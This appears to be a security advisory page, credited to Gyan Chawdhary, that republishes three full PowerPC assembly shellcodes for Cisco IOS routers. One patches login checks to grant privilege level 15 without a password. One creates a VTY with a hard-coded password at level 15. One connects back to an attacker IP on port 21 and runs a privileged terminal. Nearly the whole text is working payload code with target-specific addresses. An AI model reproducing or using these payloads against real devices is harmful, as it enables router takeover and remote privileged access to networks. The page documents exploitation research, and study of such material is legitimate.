|
|
|
|
| |
| Several Cisco IOS shellcodes have been released, these shellcodes allow an attacker to gain elevated privileges on the Cisco device if it can cause the device to execute any of the below attached shellcodes. |
| |
Credit:
The information has been provided by Gyan Chawdhary.
|
| |
Cisco IOS Tiny shellcode
# -----------------------------------------------
#
# Cisco IOS Tiny shellcode v1.0 - http://www.irmplc.com/downloads/presentations/IOS_tiny_v.1.0.txt
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# -----------------------------------------------
#
# The code creates a new TTY, and sets the privilege level to 15 without a password
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following two hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# -----------------------------------------------
.equ ret, 0x804a42e8
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# -----------------------------------------------
main:
# login patch begin
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end
# priv patch begin
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end
# exit code
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl
Cisco IOS Bind shellcode
# -----------------------------------------------
#
# Cisco IOS Bind shellcode v1.0 - http://www.irmplc.com/downloads/presentations/IOS_Bindshell_v.1.0.txt
# (c) 2007 IRM Plc
# By Varun Uppal
#
# -----------------------------------------------
#
# The code creates a new VTY, allocates a password then sets the privilege level to 15
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# Once assembled, the payload is only 116 bytes in length
#
# The following four hard-coded addresses must be located for the target IOS version.
# Version 1.1 of the shellcode will auto-locate these values and make the code
# IOS-version-independent
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# -----------------------------------------------
.equ makenewvty, 0x803d0d08
.equ malloc, 0x804785cc
.equ setpwonline, 0x803b9e90
.equ linesstruct, 0x82f9e334
# -----------------------------------------------
.equ priv, 0xf1000000 #value used to set the privilege level
main: li 3,71 #new vty line = 71
lis 9,makenewvty@ha
la 9,makenewvty@l(9)
mtctr 9
bctrl #makenewvty()
li 3,0x1e5c
lis 9,malloc@ha
la 9,malloc@l(9)
mtctr 9
bctrl #malloc() memory for structure
li 4,70
stw 4,0xa68(3)
li 5,72
stw 5,0xa6c(3)
li 4,0x00
bl setp #pointer to the password into LR
.string "1rmp455" #the password for the line
setp: mflr 5
lis 9,setpwonline@ha
la 9,setpwonline@l(9)
mtctr 9
bctrl #setpwonline()
lis 8,linesstruct@ha
la 8,linesstruct@l(8)
lwz 9,0(8)
lis 7,priv@ha
la 7,priv@l(7)
stw 7,0xde4(9) #set privilege level to 15
Cisco IOS Connectback shellcode
# -----------------------------------------------
#
# Cisco IOS Connectback shellcode v1.0 - http://www.irmplc.com/downloads/presentations/IOS_Connectback_v.1.0.txt
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# -----------------------------------------------
#
# The code creates a new TTY, allocates a shell with privilege level 15 and connects back
# on port 21
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following five hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# -----------------------------------------------
.equ malloc, 0x804785CC
.equ allocate_tty, 0x803d155c
.equ ret, 0x804a42e8
.equ addr, 0x803c4ad8
.equ str, 0x81e270b4
.equ tcp_connect, 0x80567568
.equ tcp_execute_command, 0x8056c354
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# -----------------------------------------------
main:
stwu 1,-48(1)
mflr 0
stw 31,44(1)
stw 0,52(1)
mr 31,1
li 3,512
lis 9,malloc@ha #malloc() memory for tcp structure
la 9,malloc@l(9)
mtctr 9
bctrl
mr 0,3
stw 0,20(31)
lwz 9,12(31)
li 0,1
stb 0,0(9)
lwz 9,12(31)
lis 0,0xac1e # connect back ip address
ori 0,0,1018 #
stw 0,4(9)
li 3,66
li 4,0
lis 9,allocate_tty@ha # allocate new TTY
la 9,allocate_tty@l(9)
mtctr 9
bctrl
addi 0,31,24
# Fix TTY structure to enable level 15 shell without password
#
#
##########################################################
# login patch begin
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end
#IDA placeholder for con0
#
# lis %r9, ((stdio+0x10000)@h)
# lwz %r9, stdio@l(%r9)
# lwz %r0, 0xDE4(%r9) #priv struct
#
# priv patch begin
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end
###########################################################
li 3,0
li 4,21 # Port 21 for connectback
lwz 5,12(31)
li 6,0
li 7,0
mr 8,0
li 9,0
lis 11,tcp_connect@ha # Connect to attacker IP
la 11,tcp_connect@l(11)
mtctr 11
bctrl
mr 0,3
stw 0,20(31)
li 3,66
lwz 4,20(31)
li 5,0
li 6,0
li 7,0
li 8,0
li 9,0
li 10,0
lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash
la 11,tcp_execute_command@l(11)
mtctr 11
bctrl
lwz 11,0(1)
lwz 0,4(11)
mtlr 0
lwz 31,-4(11)
mr 1,11
###########################################
lis 9, addr@ha
addi 0, 9, addr@l
mtctr 0
xor 3,3,3
addi 3,0, -2
lis 10, str@ha
addi 4, 10, str@l
bctrl
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl
|
|
|
|
|
